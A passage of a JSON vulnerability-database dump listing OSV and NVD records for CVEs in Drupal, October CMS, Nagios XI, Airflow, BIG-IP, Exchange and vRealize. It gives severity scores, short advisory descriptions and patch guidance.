This issue affects: Drupal Drupal Core 9.0 versions prior to 9.0.8, 8.9 versions prior to 8.9.9, 8.8 versions prior to 8.8.11, and 7 versions prior to 7.74.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-12T16:28:25", "type": "osv", "title": "Unrestricted Upload of File with Dangerous Type in Drupal core.", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13671"], "modified": "2023-04-11T01:41:21", "id": "OSV:GHSA-68JC-V27H-VHMW", "href": "https://osv.dev/vulnerability/GHSA-68jc-v27h-vhmw", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-03-28T05:25:23", "description": "### Impact\n\nAn attacker can exploit this vulnerability to bypass authentication using a specially crafted persist cookie.\n\n- To exploit this vulnerability, an attacker must obtain a Laravel\u2019s secret key for cookie encryption and signing.\n- Due to the logic of how this mechanism works, a targeted user account must be logged in while\nthe attacker is exploiting the vulnerability.\n- Authorization via persist cookie not shown in access logs.\n\n### Patches\n\n- Issue has been 
patched in Build 472 and v1.1.5\n- [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648)\n\n### Workarounds\n\nApply https://github.com/octobercms/library/commit/016a297b1bec55d2e53bc889458ed2cb5c3e9374 and https://github.com/octobercms/library/commit/5bd1a28140b825baebe6becd4f7562299d3de3b9 to your installation manually if you are unable to upgrade.\n\n[**Update 2022-01-20**] [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648) can be found here.\n\n### Recommendations\n\nWe recommend the following steps to make sure your server stays secure:\n\n- Keep server OS and system software up to date.\n- Keep October CMS software up to date.\n- Use a multi-factor authentication plugin.\n- Change the [default backend URL](https://github.com/octobercms/october/blob/1.1/config/cms.php#L39) or block public access to the backend area.\n- Include the [Roave/SecurityAdvisories](https://github.com/Roave/SecurityAdvisories) Composer package to ensure that your application doesn't have installed dependencies with known security vulnerabilities.\n\n### References\n\nBugs found as part of Solar Security CMS Research. 
Credits to:\n\u2022 Andrey Basarygin\n\u2022 Andrey Guzei\n\u2022 Mikhail Khramenkov\n\u2022 Alexander Sidukov\n\u2022 Maxim Teplykh\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-08-30T16:13:50", "type": "osv", "title": "October CMS auth bypass and account takeover", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-29487", "CVE-2021-32648"], "modified": "2023-03-28T05:25:19", "id": "OSV:GHSA-H76R-VGF3-J6W5", "href": "https://osv.dev/vulnerability/GHSA-h76r-vgf3-j6w5", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-08-05T05:18:59", "description": "\nTwo vulnerabilities were discovered in Drupal, a fully-featured content\nmanagement framework.\n\n\n* [CVE-2020-13666](https://security-tracker.debian.org/tracker/CVE-2020-13666)\nThe Drupal AJAX API did not disable JSONP by default, which could\n lead to cross-site scripting.\n\n\nFor setups that relied on Drupal's AJAX API for JSONP requests,\n 
either JSONP will need to be reenabled, or the jQuery AJAX API will\n have to be used instead.\n\n\nSee the upstream advisory for more details:\n <https://www.drupal.org/sa-core-2020-007>\n* [CVE-2020-13671](https://security-tracker.debian.org/tracker/CVE-2020-13671)\nDrupal failed to sanitize filenames on uploaded files, which could\n lead to those files being served as the wrong MIME type, or being\n executed depending on the server configuration.\n\n\nIt is also recommended to check previously uploaded files for\n malicious extensions. For more details see the upstream advisory:\n <https://www.drupal.org/sa-core-2020-012>\n\n\nFor Debian 9 stretch, these problems have been fixed in version\n7.52-2+deb9u12.\n\n\nWe recommend that you upgrade your drupal7 packages.\n\n\nFor the detailed security status of drupal7 please refer to\nits security tracker page at:\n<https://security-tracker.debian.org/tracker/drupal7>\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-19T00:00:00", "type": "osv", "title": "drupal7 - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": 
"AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13666", "CVE-2020-13671"], "modified": "2022-08-05T05:18:57", "id": "OSV:DLA-2458-1", "href": "https://osv.dev/vulnerability/DLA-2458-1", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-05-27T14:44:43", "description": "octobercms in a CMS platform based on the Laravel PHP Framework. In affected versions of the october/system package an attacker can request an account password reset and then gain access to the account using a specially crafted request. The issue has been patched in Build 472 and v1.1.5.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-08-26T19:15:00", "type": "cve", "title": "CVE-2021-32648", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32648"], "modified": "2022-07-02T20:00:00", "cpe": [], "id": "CVE-2021-32648", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-32648", "cvss": {"score": 
6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": []}, {"lastseen": "2023-05-23T15:43:36", "description": "An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-13T08:15:00", "type": "cve", "title": "CVE-2021-40870", "cwe": ["CWE-436"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40870"], "modified": "2022-06-28T14:11:00", "cpe": [], "id": "CVE-2021-40870", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40870", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-05-27T14:29:24", "description": "Nagios XI version xi-5.7.5 is affected by OS command injection. 
The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-15T13:15:00", "type": "cve", "title": "CVE-2021-25297", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25297"], "modified": "2023-03-01T02:15:00", "cpe": ["cpe:/a:nagios:nagios_xi:5.7.5"], "id": "CVE-2021-25297", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25297", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:29:24", "description": "Nagios XI version xi-5.7.5 is affected by OS command injection. 
The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-15T13:15:00", "type": "cve", "title": "CVE-2021-25298", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25298"], "modified": "2023-03-01T02:15:00", "cpe": ["cpe:/a:nagios:nagios_xi:5.7.5"], "id": "CVE-2021-25298", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25298", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:24:18", "description": "On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3, undisclosed requests to a virtual server may be incorrectly handled by the Traffic Management Microkernel (TMM) URI normalization, which may trigger a buffer 
overflow, resulting in a DoS attack. In certain situations, it may theoretically allow bypass of URL based access control or remote code execution (RCE). Note: Software versions which have reached End of Software Development (EoSD) are not evaluated.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-31T18:15:00", "type": "cve", "title": "CVE-2021-22991", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22991"], "modified": "2022-07-12T17:42:00", "cpe": [], "id": "CVE-2021-22991", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22991", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-05-27T14:29:24", "description": "Nagios XI version xi-5.7.5 is affected by OS command injection. 
The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-15T13:15:00", "type": "cve", "title": "CVE-2021-25296", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25296"], "modified": "2023-03-01T02:15:00", "cpe": ["cpe:/a:nagios:nagios_xi:5.7.5"], "id": "CVE-2021-25296", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25296", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T14:34:38", "description": "An issue was found in Apache Airflow versions 1.10.10 and below. 
A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-17T00:15:00", "type": "cve", "title": "CVE-2020-11978", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:apache:airflow:1.10.10"], "id": "CVE-2020-11978", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-11978", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:airflow:1.10.10:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:19:57", "description": "The System Information Library for Node.JS (npm package \"systeminformation\") is an open source collection of functions to retrieve detailed hardware, system and OS information. 
In systeminformation before version 5.3.1 there is a command injection vulnerability. Problem was fixed in version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-16T17:15:00", "type": "cve", "title": "CVE-2021-21315", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21315"], "modified": "2021-03-25T18:41:00", "cpe": ["cpe:/a:apache:cordova:10.0.0"], "id": "CVE-2021-21315", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21315", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:cordova:10.0.0:*:*:*:*:-:*:*"]}, {"lastseen": "2023-06-05T14:40:22", "description": "The previous default setting for Airflow's Experimental API was to allow all API requests without authentication, but this poses security risks to users who miss this fact. 
From Airflow 1.10.11 the default has been changed to deny all requests by default and is documented at https://airflow.apache.org/docs/1.10.11/security.html#api-authentication. Note this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide: https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-10T16:15:00", "type": "cve", "title": "CVE-2020-13927", "cwe": ["CWE-1188"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13927"], "modified": "2022-07-12T17:42:00", "cpe": [], "id": "CVE-2020-13927", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-13927", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-05-23T15:29:20", "description": "Microsoft Exchange Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-14T18:15:00", "type": "cve", "title": "CVE-2021-33766", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2021-07-16T14:41:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2013", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2021-33766", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33766", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_20:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_9:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:21:46", "description": "Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative 
credentials.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T18:15:00", "type": "cve", "title": "CVE-2021-21975", "cwe": ["CWE-918"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-02-01T17:45:00", "cpe": ["cpe:/a:vmware:vrealize_operations_manager:8.1.1", "cpe:/a:vmware:cloud_foundation:3.7.1", "cpe:/a:vmware:vrealize_operations_manager:8.3.0", "cpe:/a:vmware:cloud_foundation:3.9", "cpe:/a:vmware:cloud_foundation:3.8", "cpe:/a:vmware:cloud_foundation:3.8.1", "cpe:/a:vmware:vrealize_operations_manager:7.0.0", "cpe:/a:vmware:cloud_foundation:4.0.1", "cpe:/a:vmware:vrealize_operations_manager:8.0.1", "cpe:/a:vmware:vrealize_operations_manager:8.0.0", "cpe:/a:vmware:vrealize_operations_manager:8.2.0", "cpe:/a:vmware:cloud_foundation:4.0", "cpe:/a:vmware:vrealize_operations_manager:8.1.0", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.1", "cpe:/a:vmware:cloud_foundation:3.5", "cpe:/a:vmware:vrealize_operations_manager:7.5.0", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.2", "cpe:/a:vmware:cloud_foundation:3.7", 
"cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.0.1", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.0", "cpe:/a:vmware:cloud_foundation:3.10", "cpe:/a:vmware:cloud_foundation:3.9.1", "cpe:/a:vmware:cloud_foundation:3.0", "cpe:/a:vmware:cloud_foundation:3.0.1", "cpe:/a:vmware:cloud_foundation:3.5.1", "cpe:/a:vmware:cloud_foundation:3.7.2", "cpe:/a:vmware:cloud_foundation:3.0.1.1"], "id": "CVE-2021-21975", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21975", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:vmware:vrealize_operations_manager:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:7.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.9:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7.2:*:*:*:*:*:*:*", 